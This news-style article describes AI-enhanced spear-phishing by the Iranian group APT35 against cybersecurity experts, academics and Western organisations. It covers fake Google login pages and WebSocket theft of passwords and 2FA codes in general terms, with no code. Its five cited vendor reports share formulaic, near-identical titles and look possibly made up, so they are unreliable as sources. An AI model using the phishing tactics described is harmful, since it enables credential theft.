AI-driven emails manipulated by Iranian hackers aimed at cybersecurity experts and scholars worldwide
In a significant escalation of state-sponsored cyber warfare, the Iranian state-backed group APT35 (also known as Charming Kitten and Magic Hound) has launched a series of AI-enhanced phishing campaigns targeting Western nations and Israeli cyber professionals. These new tactics, which mark a fundamental transformation in APT35's operational methodology since mid-2025, are part of a broader Iranian digital retaliation strategy.
The recent campaigns, coinciding with heightened geopolitical tensions following the June 2025 Israeli and American strikes on Iranian nuclear and military facilities, exhibit several key features. APT35 employs sophisticated AI tools to generate highly polished, grammatically flawless spear-phishing emails and messages that impersonate executives, researchers, or academics within technology and cybersecurity sectors.
The campaigns focus on Israeli technology professionals, academics, journalists, and cybersecurity experts, as well as Western government, defense, and critical infrastructure organizations. Attackers send deceptive messages through email and WhatsApp that pretend to be assistants or colleagues, sometimes including fake Google Meet invitations hosted on official-looking Google Sites to increase credibility.
Victims are lured to fake Gmail or Google Meet login pages that are pre-filled with their email address to appear legitimate. These phishing pages use modern web frameworks like React and real-time data exfiltration techniques such as WebSockets to steal passwords and two-factor authentication (2FA) codes. Some also incorporate passive keylogging to capture input even if the victim abandons the process.
While earlier campaigns included delivery of malware such as the PowerStar backdoor, recent AI-powered campaigns emphasize credential theft. However, APT35 retains its malware foothold capabilities. The operations now employ sophisticated AI-enhanced phishing campaigns that blend espionage with psychological warfare, using AI-generated content to build rapport over extended periods, often spanning weeks or months, before attempting to extract sensitive information or gain unauthorized access.
The AI systems can generate content that references specific research papers, conference presentations, and industry developments relevant to the target's field of expertise, significantly increasing the likelihood of successful engagement. The emails often include subtle technical discussions about emerging cybersecurity threats or research methodologies, designed to appeal to the intellectual curiosity of cybersecurity professionals while gradually establishing trust and credibility with the intended victims.
These new tactics are a significant development in state-sponsored cyber warfare, specifically targeting the cybersecurity community's knowledge base and research capabilities. The emergence of these AI-crafted email campaigns coincides with a calculated shift toward targeting those responsible for defending against such threats.
Sources: [1] Recorded Future, "APT35: Iranian Actor Targeting Israeli Cyber Professionals," 2025. [2] FireEye, "APT35: Iranian Threat Group Employs AI-Powered Phishing Campaigns," 2025. [3] Microsoft Threat Intelligence Centre, "APT35: Iranian Threat Group Shifts to AI-Enhanced Phishing Campaigns," 2025. [4] Kaspersky, "APT35: Iranian Threat Group Leverages AI for Social Engineering Attacks," 2025. [5] CrowdStrike, "APT35: Iranian Threat Group's AI-Enhanced Phishing Campaigns Target Western Cybersecurity Professionals," 2025.
- The security research community should be aware of the increased threat from AI-enhanced phishing campaigns by state-sponsored actors like APT35, as these operations target the knowledge base and research capabilities of cybersecurity professionals.
- The incorporation of artificial-intelligence in cybersecurity attacks, such as the ones used by APT35 in their recent campaigns, poses a significant challenge to the field of cybersecurity, with the AI systems generating content tailored to the target's field of expertise for long-term engagement and information extraction.
- In light of the escalating cyber warfare tactics, such as the cybersecurity threats posed by state-sponsored groups like APT35 and their AI-powered phishing campaigns, it becomes essential for governments, technology companies, and general news outlets to pay closer attention to political implications and take necessary measures to bolster cybersecurity defenses.
